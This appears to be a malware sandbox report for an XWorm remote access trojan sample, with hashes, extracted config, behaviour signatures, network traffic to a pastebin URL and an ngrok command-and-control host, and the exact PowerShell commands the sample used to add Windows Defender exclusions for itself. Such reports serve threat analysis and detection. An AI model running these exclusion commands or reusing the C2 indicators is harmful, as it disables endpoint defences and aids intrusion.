Overview

overview

10

Static

static

10

Dropper/Berbew.exe

windows7-x64

10

Dropper/Berbew.exe

windows10-2004-x64

10

Dropper/Phorphiex.exe

windows7-x64

10

Dropper/Phorphiex.exe

windows10-2004-x64

10

RAT/31.exe

windows7-x64

10

RAT/31.exe

windows10-2004-x64

10

RAT/XClient.exe

windows7-x64

10

RAT/XClient.exe

windows10-2004-x64

10

RAT/file.exe

windows7-x64

7

RAT/file.exe

windows10-2004-x64

7

Ransomware...-2.exe

windows7-x64

10

Ransomware...-2.exe

windows10-2004-x64

10

Ransomware...01.exe

windows7-x64

10

Ransomware...01.exe

windows10-2004-x64

10

Ransomware...lt.exe

windows7-x64

10

Ransomware...lt.exe

windows10-2004-x64

10

Stealers/Azorult.exe

windows7-x64

10

Stealers/Azorult.exe

windows10-2004-x64

10

Stealers/B...on.exe

windows7-x64

10

Stealers/B...on.exe

windows10-2004-x64

10

Stealers/Dridex.dll

windows7-x64

10

Stealers/Dridex.dll

windows10-2004-x64

10

Stealers/M..._2.exe

windows7-x64

10

Stealers/M..._2.exe

windows10-2004-x64

10

Stealers/lumma.exe

windows7-x64

10

Stealers/lumma.exe

windows10-2004-x64

10

Trojan/BetaBot.exe

windows7-x64

10

Trojan/BetaBot.exe

windows10-2004-x64

10

Trojan/Smo...er.exe

windows7-x64

10

Trojan/Smo...er.exe

windows10-2004-x64

10

Resubmissions

03/09/2024, 14:02 UTC

240903-rb57sazdqf 10

03/09/2024, 13:51 UTC

240903-q59avszclf 10

02/09/2024, 19:51 UTC

240902-yk8gtsxbpd 10

02/09/2024, 02:27 UTC

240902-cxh7tazflg 10

02/09/2024, 02:26 UTC

240902-cwxc2sygll 10

21/06/2024, 19:37 UTC

240621-yca7cszgnd 10

09/06/2024, 17:07 UTC

240609-vm7rjadd73 10

13/05/2024, 17:36 UTC

240513-v6qblafe3y 10

12/05/2024, 17:17 UTC

240512-vty3zafh5s 10

Analysis

  • max time kernel
    139s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/09/2024, 14:02 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RAT/XClient.exe

  • Size

    172KB

  • MD5

    75ba783757c5b61bd841afa136fc3eda

  • SHA1

    8db9cda9508471a23f9b743027fa115e01bc1fe1

  • SHA256

    75a8719e83e4aecbe51287d7bfaf1e334fa190c7784324f24bcf61ab984de20a

  • SHA512

    9a6cfbf4302336662527837bf60b30b458f8d438bd6e9563093d4948bf81c79d56578e965d836e90aafde553d1cdc9c6df81a254aafcfb3379fbe6405dce0ea1

  • SSDEEP

    1536:vJcr5kCyoAp30kaF6CiJzt7UbjFdZe8e6TOAJkU7JsOpysa7iAMI:BcmNNxda6zZUbjHZe8jO6H2OpYuAf

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • pastebin_url

    https://pastebin.com/raw/2jTT3Lnj

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100

Network

  • flag-us
    DNS
    ip-api.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    XClient.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 03 Sep 2024 14:02:37 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    pastebin.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.3.235
    pastebin.com
    IN A
    104.20.4.235
    pastebin.com
    IN A
    172.67.19.24
  • flag-us
    GET
    https://pastebin.com/raw/2jTT3Lnj
    XClient.exe
    Remote address:
    104.20.3.235:443
    Request
    GET /raw/2jTT3Lnj HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 03 Sep 2024 14:02:40 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 612
    Last-Modified: Tue, 03 Sep 2024 13:52:28 GMT
    Server: cloudflare
    CF-RAY: 8bd647623bfa7725-LHR
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.68.56.232
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.124.67.191
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.124.67.191
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    XClient.exe
    356 B
     347 B
     6
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 104.20.3.235:443
    https://pastebin.com/raw/2jTT3Lnj
    tls, http
    XClient.exe
    785 B
     3.7kB
     9
    9

    HTTP Request

    GET https://pastebin.com/raw/2jTT3Lnj

    HTTP Response

    200
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     80 B
     3
    2
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     80 B
     3
    2
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     80 B
     3
    2
  • 8.8.8.8:53
    ip-api.com
    dns
    XClient.exe
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    pastebin.com
    dns
    XClient.exe
    58 B
     106 B
     1
    1

    DNS Request

    pastebin.com

    DNS Response

    104.20.3.235
    104.20.4.235
    172.67.19.24

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
     79 B
     1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.68.56.232

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
     79 B
     1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.124.67.191

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
     79 B
     1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.124.67.191

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BKR2U99A7A7VJKD5DENG.temp
    Filesize

    7KB

    MD5

    65103f58fc6d4df2391a0cf287777c98

    SHA1

    6e9a69e3f10d74af56c8ea02f1359195110c9696

    SHA256

    87187f23e692be55ae0d359a6035e6deecd4e82949d879837ed5fd6914a83b00

    SHA512

    ea52d1bdd38a29f734eae796c115379ba991567a479ef814578106d0bb7ff1b741699f59f5259992f79ed760523074c3da133cfa200998b3abe20d7bf874718f

    Download Submit

  • memory/2344-0-0x000007FEF4F63000-0x000007FEF4F64000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2344-1-0x0000000000C90000-0x0000000000CC0000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2344-2-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2344-30-0x000007FEF4F63000-0x000007FEF4F64000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2344-31-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2736-15-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2736-14-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2864-8-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2864-7-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

    Filesize

    2.9MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.